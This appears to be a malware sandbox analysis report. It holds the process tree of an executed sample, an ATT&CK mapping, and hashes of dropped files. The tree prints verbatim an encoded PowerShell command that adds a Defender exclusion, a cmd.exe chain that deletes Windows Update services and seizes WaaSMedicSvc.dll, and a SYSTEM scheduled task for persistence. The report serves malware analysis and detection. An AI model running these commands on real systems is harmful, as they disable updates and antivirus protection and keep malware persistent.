C:\Windows\System32\dialer.exe tuczxejnwvufkvmy0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/r1fSHnQn/pEJoE0c2Z8yo6KfLQ7T4O/sPytLA1Ofy6pCJPfSldtWwn5MefTIOJwpGDgIBcVL3mnhbdQl7r9kVrbyBSbRTxTWkEMFXHM6mel4aCfmftFypMhsz+/XH1E0hLhu4BSXq/o7kGj4I4EWA8d7/NcIvtUambozA877872MOPkfuoq6bfGtpEjUu1U19sqZWGfdh5fNeKW+HxsBw01PpwWKMod5fwuXcPDtZzO9Y5GZ/WMFheKxDEMGjCxi5wvdL6r6Xu3cxFpqAJEo8eiYnmGP8rnU8j/vu+XhFQuLjC7zSu0nMBx360BhinwiE4UhlNjs80duPhebhj+vKCD4Uufq+UsQbo/1rZgtkwdlevHGq8YKILuUh5DjE2IKiBb1ZnCXupMzMezP3iLtvADA43ac+eBkp2SEGHHV7CPgzAX7bbJtNeWefpaVLgjv+as7955WlaP0GVDjFKTQoUN56RY0aLZUiAaX6UbPAgeFXukUvQQ0IBZg7zqzvndakosTXsagspiC4NAFXOKFbRuqrfiIAbIJAfMwZ65cuwioWpG1q3VQUCN0q3TWRhah
5⤵
PID:2264

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
- Drops file in System32 directory
PID:2900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:276

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:2284

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1060

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:604

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
3⤵
PID:2536

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{11a0a240-e97a-4e75-af75-2abc306c87a7}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{552adc47-c6b4-4521-996f-fdcef9ce873a}
2⤵
PID:1996

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe
"C:\Users\Admin\AppData\Local\Temp\abdd8d2b92994b87215496904e6f7b352de5391eab24275a394c6eb018d29273.exe"
2⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBsAGYAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBjACMAPgA="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1720

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2964

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:2472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2500

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:536

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:596

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:2232

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1708

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:2016

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:768

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2940

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2708

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2868

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:2784

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:2000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:2344

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:2640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1512

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"
4⤵
PID:2688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
4⤵
PID:2060

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Drops file in Windows directory
PID:2156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2720

C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe
"C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2844

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1192

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Windows\system32\schtasks.exe
schtasks /run /tn "DBassistant"
1⤵
PID:1536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20643481801792225272-992503127-90895432-595914365-455286142-1181026813-1862876821"
1⤵
PID:1664

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
1⤵
- Creates scheduled task(s)
PID:2068

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:1844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1846797123-2062503149290397976-10028092241654692815-15478217311975703600-1186339380"
1⤵
PID:2024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1489727636-1961177061-4004935411066395439-20336602-582376702840099529-964560803"
1⤵
PID:1932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3003360311913516000544649110-34758224519226720931554117918839555401523194891"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2932

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-290095400-1229035188-19819824661381709673-791935426-365540714561266111503201064"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2424

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File and Directory Permissions Modification

T1222

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe
Filesize
21.1MB

MD5
cfe54b127515435a445b8797027103ce

SHA1
9b9016b0f99c3a6afedd2b3e1aa8823c42115d4b

SHA256
5108ab06d0001668bbd0643f60201e9af5fac4109a77b94fcd95fd1c2b643084

SHA512
6e1b1e5af7e463a481acf24f0ba0b45a25cffa6b86dd9ee2c5d959aa2dae130b7c6e199a5de20244fd7c15310be28a161aa85ed9ccf895a1426bc64f4f826c25

Download Submit
C:\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe
Filesize
21.1MB

MD5
cfe54b127515435a445b8797027103ce

SHA1
9b9016b0f99c3a6afedd2b3e1aa8823c42115d4b

SHA256
5108ab06d0001668bbd0643f60201e9af5fac4109a77b94fcd95fd1c2b643084

SHA512
6e1b1e5af7e463a481acf24f0ba0b45a25cffa6b86dd9ee2c5d959aa2dae130b7c6e199a5de20244fd7c15310be28a161aa85ed9ccf895a1426bc64f4f826c25

Download Submit
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
C:\Windows\System32\perfc007.dat
Filesize
141KB

MD5
0f3d76321f0a7986b42b25a3aa554f82

SHA1
7036bba62109cc25da5d6a84d22b6edb954987c0

SHA256
dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460

SHA512
bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0

Download Submit
C:\Windows\System32\perfc00A.dat
Filesize
154KB

MD5
f0ecfbfa3e3e59fd02197018f7e9cb84

SHA1
961e9367a4ef3a189466c0a0a186faf8958bdbc4

SHA256
cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324

SHA512
116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294

Download Submit
C:\Windows\System32\perfc00C.dat
Filesize
145KB

MD5
ce233fa5dc5adcb87a5185617a0ff6ac

SHA1
2e2747284b1204d3ab08733a29fdbabdf8dc55b9

SHA256
68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31

SHA512
1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

Download Submit
C:\Windows\System32\perfc010.dat
Filesize
142KB

MD5
d73172c6cb697755f87cd047c474cf91

SHA1
abc5c7194abe32885a170ca666b7cce8251ac1d6

SHA256
9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57

SHA512
7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

Download Submit
C:\Windows\System32\perfc011.dat
Filesize
114KB

MD5
1f998386566e5f9b7f11cc79254d1820

SHA1
e1da5fe1f305099b94de565d06bc6f36c6794481

SHA256
1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea

SHA512
a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

Download Submit
C:\Windows\System32\perfh007.dat
Filesize
680KB

MD5
b69ab3aeddb720d6ef8c05ff88c23b38

SHA1
d830c2155159656ed1806c7c66cae2a54a2441fa

SHA256
24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625

SHA512
4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d

Download Submit
C:\Windows\System32\perfh009.dat
Filesize
646KB

MD5
aecab86cc5c705d7a036cba758c1d7b0

SHA1
e88cf81fd282d91c7fc0efae13c13c55f4857b5e

SHA256
9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066

SHA512
e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8

Download Submit
C:\Windows\System32\perfh00A.dat
Filesize
727KB

MD5
7d0bac4e796872daa3f6dc82c57f4ca8

SHA1
b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a

SHA256
ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879

SHA512
145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

Download Submit
C:\Windows\System32\perfh00C.dat
Filesize
727KB

MD5
5f684ce126de17a7d4433ed2494c5ca9

SHA1
ce1a30a477daa1bac2ec358ce58731429eafe911

SHA256
2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c

SHA512
4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

Download Submit
C:\Windows\System32\perfh010.dat
Filesize
722KB

MD5
4623482c106cf6cc1bac198f31787b65

SHA1
5abb0decf7b42ef5daf7db012a742311932f6dad

SHA256
eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349

SHA512
afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

Download Submit
C:\Windows\System32\perfh011.dat
Filesize
406KB

MD5
54c674d19c0ff72816402f66f6c3d37c

SHA1
2dcc0269545a213648d59dc84916d9ec2d62a138

SHA256
646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5

SHA512
4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.h
Filesize
3KB

MD5
b133a676d139032a27de3d9619e70091

SHA1
1248aa89938a13640252a79113930ede2f26f1fa

SHA256
ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

SHA512
c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

Download Submit
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
Filesize
27KB

MD5
46d08e3a55f007c523ac64dce6dcf478

SHA1
62edf88697e98d43f32090a2197bead7e7244245

SHA256
5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614

SHA512
b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
972c662669612905dfe23f06b4e5f826

SHA1
747b3cf372b3b430733dd7d7aab9dee988299cbf

SHA256
bc5ff70b71561b303b822d07d587b16a110352fbb7403ffcf1e8b4682c3338ee

SHA512
7c6ae6a81120a9ae2e568196b7fa1fb6b38de318acba4cb32bf76eb94b7e82be369fb85929da44cf9b676e0a3ac5b7b8e3d66f8534d4e2623cf7de960dbad82a

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\Reg.Organizer.v9.11.exe
Filesize
21.1MB

MD5
cfe54b127515435a445b8797027103ce

SHA1
9b9016b0f99c3a6afedd2b3e1aa8823c42115d4b

SHA256
5108ab06d0001668bbd0643f60201e9af5fac4109a77b94fcd95fd1c2b643084

SHA512
6e1b1e5af7e463a481acf24f0ba0b45a25cffa6b86dd9ee2c5d959aa2dae130b7c6e199a5de20244fd7c15310be28a161aa85ed9ccf895a1426bc64f4f826c25

Download Submit
\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
\Users\Admin\AppData\Local\Temp\lrucache.exe
Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
\Users\Admin\AppData\Local\Temp\lrucache.exe
Filesize
681KB

MD5
6a4308bc229b64cf5bc6d359056b8980

SHA1
29f6484fafd50f0c00b5be01d97e82ffeda6f75b

SHA256
5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7

SHA512
f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

Download Submit
\Users\Admin\AppData\Local\Temp\nsi4A1C.tmp\LangDLL.dll
Filesize
5KB

MD5
109b201717ab5ef9b5628a9f3efef36f

SHA1
98db1f0cc5f110438a02015b722778af84d50ea7

SHA256
20e642707ef82852bcf153254cb94b629b93ee89a8e8a03f838eef6cbb493319

SHA512
174e241863294c12d0705c9d2de92f177eb8f3d91125b183d8d4899c89b9a202a4c7a81e0a541029a4e52513eee98029196a4c3b8663b479e69116347e5de5b4

Download Submit
\Users\Admin\AppData\Local\Temp\nsi4A1C.tmp\nsDialogs.dll
Filesize
9KB

MD5
ec9640b70e07141febbe2cd4cc42510f

SHA1
64a5e4b90e5fe62aa40e7ac9e16342ed066f0306

SHA256
c5ba017732597a82f695b084d1aa7fe3b356168cc66105b9392a9c5b06be5188

SHA512
47605b217313c7fe6ce3e9a65da156a2fba8d91e4ed23731d3c5e432dd048ff5c8f9ae8bb85a6a39e1eac4e1b6a22862aa72d3b1b1c8255858997cdd4db5d1fe

Download Submit
\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
Filesize
2.7MB

MD5
4aa93e0824a18695711b1d8ad90ca09c

SHA1
46a285fe98b63db613c56802a835a51d13c10049

SHA256
de0a752dbbc3bd6400f8d120d8d87c0541dd1718d5ebd922ddcd622e51969d24

SHA512
be4d2971e8f6c702249ca80636dbb8d1344a0bc119a8df8b5fe54697e7d914645fbee07733e9ce614ffcad21f9e706c879ae8796255c01e6f7a62fb3937e8c09

Download Submit
memory/276-363-0x00000000009D0000-0x00000000009FA000-memory.dmp

Filesize
168KB

Download
memory/276-364-0x00000000370E0000-0x00000000370F0000-memory.dmp

Filesize
64KB

Download
memory/420-129-0x0000000000280000-0x00000000002A3000-memory.dmp

Filesize
140KB

Download
memory/420-131-0x00000000002B0000-0x00000000002DA000-memory.dmp

Filesize
168KB

Download
memory/420-140-0x000007FEBDF10000-0x000007FEBDF20000-memory.dmp

Filesize
64KB

Download
memory/420-144-0x00000000770F1000-0x00000000770F2000-memory.dmp

Filesize
4KB

Download
memory/420-146-0x00000000370E0000-0x00000000370F0000-memory.dmp

Filesize
64KB

Download
memory/420-128-0x0000000000280000-0x00000000002A3000-memory.dmp

